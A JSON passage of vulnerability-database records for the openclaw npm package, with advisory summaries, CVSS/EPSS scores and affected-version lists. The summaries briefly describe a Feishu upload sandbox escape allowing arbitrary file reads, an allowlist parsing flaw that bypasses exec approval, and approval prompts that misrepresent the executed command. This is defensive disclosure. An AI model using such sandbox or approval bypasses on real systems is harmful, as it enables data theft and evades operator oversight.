9h9","reference_id":"GHSA-ch86-pxr9-j9h9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ch86-pxr9-j9h9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-ch86-pxr9-j9h9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qjss-tvgk-3ubk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91256?format=json","vulnerability_id":"VCID-qjvc-etb4-qbfv","summary":"OpenClaw: Feishu extension resolveUploadInput bypasses file-system sandbox and allows arbitrary file reads via upload_image\n## Summary\n\nFeishu upload path resolution could read files outside the configured localRoots sandbox before handing them to the upload path.\n\n## Impact\n\nA tool caller constrained to workspace or localRoots paths could exfiltrate arbitrary host files through Feishu upload actions.\n\n## Affected Component\n\n`extensions/feishu/src/docx.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.6, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `764394c78b` (`fix: enforce localRoots sandbox on Feishu docx upload file reads`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41363","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18387","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18424","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18421","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41363"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41363","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41363"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter"},{"reference_url":"https://github.com/advisories/GHSA-qf48-qfv4-jjm9","reference_id":"GHSA-qf48-qfv4-jjm9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qf48-qfv4-jjm9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41363","GHSA-qf48-qfv4-jjm9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qjvc-etb4-qbfv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91672?format=json","vulnerability_id":"VCID-qquc-rw1d-m7ec","summary":"Duplicate Advisory: OpenClaw macOS companion app (beta): allowlist parsing mismatch for system.run shell chains\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-5f9p-f3w2-fwch. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an allowlist parsing mismatch vulnerability in the macOS companion app that allows authenticated operators to bypass exec approval checks. Attackers with operator.write privileges and a paired macOS beta node can craft shell-chain payloads that pass incomplete allowlist validation and execute arbitrary commands on the paired host.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/5da03e622119fa012285cdb590fcf4264c965cb5","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5da03e622119fa012285cdb590fcf4264c965cb5"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e371da38aab99521c4e076cd3d95fd775e00b784","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e371da38aab99521c4e076cd3d95fd775e00b784"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-parsing-mismatch-in-system-run-shell-chains","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-parsing-mismatch-in-system-run-shell-chains"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31993","reference_id":"CVE-2026-31993","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31993"},{"reference_url":"https://github.com/advisories/GHSA-5326-6f73-m96w","reference_id":"GHSA-5326-6f73-m96w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5326-6f73-m96w"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5f9p-f3w2-fwch","reference_id":"GHSA-5f9p-f3w2-fwch","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5f9p-f3w2-fwch"}],"fixed_packages":[],"aliases":["GHSA-5326-6f73-m96w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qquc-rw1d-m7ec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90800?format=json","vulnerability_id":"VCID-qr66-xgea-tufh","summary":"OpenClaw: Node-host approvals could show misleading shell payloads instead of the executed argv\n## Summary\nIn affected versions of `openclaw`, node-host `system.run` approvals could display only an extracted shell payload such as `jq --version` while execution still ran a different outer wrapper argv such as `./env sh -c 'jq --version'`.\n\n## Impact\nThis is an approval-integrity bug. An attacker who could place or select a local wrapper binary and induce a wrapper-shaped command could get local code executed after the operator approved misleading command text.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nWrapper resolution normalized executables by basename and extracted inner shell payload text for approval display, while execution still preserved the full wrapper argv. Approval storage and UI therefore showed text that did not match the exact command OpenClaw would execute.\n\n## Fix\nOpenClaw now binds approvals to the exact executed argv and keeps extracted shell payload text only as secondary preview data. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32971","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05075","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.0506","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06165","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32971"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T14:57:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T14:57:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands"},{"reference_url":"https://github.com/advisories/GHSA-rw39-5899-8mxp","reference_id":"GHSA-rw39-5899-8mxp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rw39-5899-8mxp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vu